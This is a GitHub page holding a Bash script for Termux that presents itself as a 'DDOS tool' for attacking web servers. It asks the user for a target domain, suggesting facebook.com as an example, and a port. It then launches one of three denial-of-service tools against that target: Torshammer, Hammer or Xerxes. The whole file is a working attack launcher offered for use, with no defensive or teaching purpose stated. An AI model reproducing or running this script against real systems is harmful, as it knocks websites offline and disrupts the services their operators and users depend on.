forked from verluchie/dost-attack
-
Notifications
You must be signed in to change notification settings - Fork 0
/
dost
73 lines (66 loc) · 1.91 KB
/
dost
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
#!/data/data/com.termux/files/usr/bin/bash
# DDOS TOOLS FOR TERMUX
# Made by V3rluchie
# Recode The Copyright is not make you Coders
#bersih
clear
echo "██████╗ ██████╗ ███████╗████████╗
██╔══██╗██╔═══██╗██╔════╝╚══██╔══╝
██║ ██║██║ ██║███████╗ ██║
██║ ██║██║ ██║╚════██║ ██║
██████╔╝╚██████╔╝███████║ ██║
╚═════╝ ╚═════╝ ╚══════╝ ╚═╝
"
echo "=============================================="
echo "# DOST WebServer Attacking Tools #"
echo "# Coded By V3rluchie #"
echo "# [email protected] #"
echo "# http://squadcyber.org #"
echo "=============================================="
echo ""
echo "Recode The Copyright is not make you Coders"
echo "-------------------------------------------"
echo ""
echo "Enter domain of your target"
echo "ex : http://facebook.com"
echo ""
read -p "[m4qlo@home]>" hai;
echo ""
echo ""
echo "Enter port of your target"
echo "Default : 80"
echo ""
read -p "[m4qlo@home]>" por;
echo ""
echo ""
echo "Enter number of tool what do you want to use"
echo ""
echo "[1] Torshammer"
echo "[2] Hammer"
echo "[3] Xerxes"
echo ""
read -p "[m4qlo@home]>" tol;
echo ""
echo ""
clear
echo "Target : $hai"
echo "Port : $por"
echo "Tool : $tol"
sleep 2
echo "Attacking..........."
sleep 1
if [ $tol = 1 ] || [ $tol = 01 ]
then
cd ~/m4qlo/torshammer
python2 torshammer.py -t $hai -p $por
fi
if [ $tol = 2 ] || [ $tol = 02 ]
then
cd ~/m4qlo/hammer
python hammer.py -s $hai -p $por
fi
if [ $tol = 3 ] || [ $tol = 03 ]
then
cd ~/m4qlo/xerxes
./xerxes $hai $por
fi